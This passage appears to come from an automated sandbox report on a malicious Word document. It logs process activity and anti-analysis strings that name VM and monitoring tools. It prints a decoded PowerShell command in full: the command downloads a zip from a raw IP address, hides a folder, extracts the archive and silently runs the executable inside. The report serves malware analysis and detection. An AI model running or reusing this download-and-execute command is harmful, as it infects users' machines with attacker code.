      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEXEGC.E?
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: FROMUTF16ERRORP4YX0RL0S31.0KEYKEYSETS A KEYFILESETS THE INPUT FILE OR DIRECTORYFILEVMSRVC.EXETCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVMWARE.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXEVBOXTRAY.EXEVMTOOLSD.EXEVMRAWDSK.SYS.VMUSBMOUSE.SYS.DF5SERV.EXEVBOXSERVICE.EXE
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXELBEIGC.E
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEXEGC.E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3450Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6285Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -20291418481080494s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: run.exe, 00000008.00000002.1904849243.000002AD602AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc.exemlbeigc.e
      Source: run.exe, 00000010.00000002.2012952957.0000015C34758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware.exeexeeigc.e8
      Source: run.exe, 00000010.00000002.2012952957.0000015C34758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware.exeexeeigc.e
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: run.exe, 00000008.00000003.1904545786.000002AD602BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'Dc
      Source: run.exe, 00000010.00000002.2012952957.0000015C34758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe.eigc.eh
      Source: run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: FromUtf16Errorp4yx0rl0s31.0keyKEYSets a keyfileSets the input file or directoryFILEvmsrvc.exetcpview.exewireshark.exefiddler.exevmware.exeVirtualBox.exeprocexp.exeautoit.exevboxtray.exevmtoolsd.exevmrawdsk.sys.vmusbmouse.sys.df5serv.exevboxservice.exe
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exegc.e
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exeys.gc.e
      Source: run.exe, 00000010.00000002.2012952957.0000015C34758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exebeigc.e
      Source: powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: run.exe, 00000016.00000002.2092346395.0000024285648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exegc.e7
      Source: powershell.exe, 00000004.00000002.1888734931.00000000074A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: run.exe, 00000010.00000002.2012952957.0000015C34758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe.eigc.e
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\p4yx0rl0s3\run.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi32_7268.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7268, type: MEMORYSTR
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: Base64 decoded $url = "http://91.208.206.195/d/assignment.zip";$path = "C:\Users\$env:username\p4yx0rl0s3";mkdir $path;Set-ItemProperty -Path $path -Name Attributes -Value ([System.IO.FileAttributes]::Hidden);(New-Object Net.WebClient).DownloadFile($url, $path + "\assignment.zip");Expand-Archive -Path "$path\assignment.zip" -DestinationPath "$path\assignment(2)";Expand-Archive -Path "$path\assignment(2)\assignment(2).zip" -DestinationPath "$path";cd $path;Start-Process "run.exe" -WindowStyle Hidden
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: Base64 decoded $url = "http://91.208.206.195/d/assignment.zip";$path = "C:\Users\$env:username\p4yx0rl0s3";mkdir $path;Set-ItemProperty -Path $path -Name Attributes -Value ([System.IO.FileAttributes]::Hidden);(New-Object Net.WebClient).DownloadFile($url, $path + "\assignment.zip");Expand-Archive -Path "$path\assignment.zip" -DestinationPath "$path\assignment(2)";Expand-Archive -Path "$path\assignment(2)\assignment(2).zip" -DestinationPath "$path";cd $path;Start-Process "run.exe" -WindowStyle HiddenJump to behavior
      Source: C:\Users\user\p4yx0rl0s3\run.exeNtReadFile: Indirect: 0x7FF63D515746
      Source: C:\Users\user\p4yx0rl0s3\run.exeNtWriteFile: Indirect: 0x7FF63D515866
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\p4yx0rl0s3\run.exe "C:\Users\user\p4yx0rl0s3\run.exe" Jump to behavior
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Users\user\p4yx0rl0s3\run.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
